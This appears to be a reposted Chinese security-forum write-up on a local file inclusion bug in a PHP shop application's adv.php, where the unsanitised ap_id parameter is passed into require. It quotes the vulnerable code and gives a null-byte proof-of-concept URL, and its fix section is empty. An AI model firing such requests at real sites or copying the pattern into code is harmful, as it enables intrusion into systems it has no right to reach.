这个东西前面还有个xss https://www.2cto.com/Article/201107/98039.html
--------------------------------------------------------------------------------
 
GPC面前一切都是浮云。。所以鸡肋。。
./control/adv.php
 
class advControl {
 
    /**
 
         *
 
         * 广告展示
 
         */
 
        public function advshowOp(){
 
                if(trim($_GET['ap_id']) == '')exit;
 
                $time    = time();
 
                //加载广告位缓存文件
 
                $ap_cache_file = BasePath.DS.'cache'.DS.'adv'.DS.'ap_'.$_GET['ap_id'].'.cache.php'; //直接包含了。。
 
                if(file_exists($ap_cache_file)){
 
                        require($ap_cache_file);
 
                }else{
 
                        exit;
 
                }./global.php

 
if($_GET['act'] == 'adv' && ProjectName == ''){
 
        define('ATTACH_ADV','upload/adv');
 
        require_once(BasePath.DS.'config.ini.php');
 
        define('SiteUrl',$site_url);
 
        $advshow_classfile = BasePath.DS.'control/adv.php';
 
        echo "<h1>sbsb</h1>";
 
        if(file_exists($advshow_classfile)){
 
        echo "<h1>sbsb</h1>";
 
                include_once ($advshow_classfile);
 
                $advshow = new advControl();
 
                $advshow->advshowOp(); //this..
 
               
 
        }else{
 
                echo "Adv System Inner Error!";
 
        }
 
略Exp
https://www.2cto.com /2008/upload/index.php?act=adv&ap_id=.sss.sb%00
 
 修古:

参考以上代码分析以及本站前面的文文章
 From:https://t00ls.net/thread-20191-1-1.html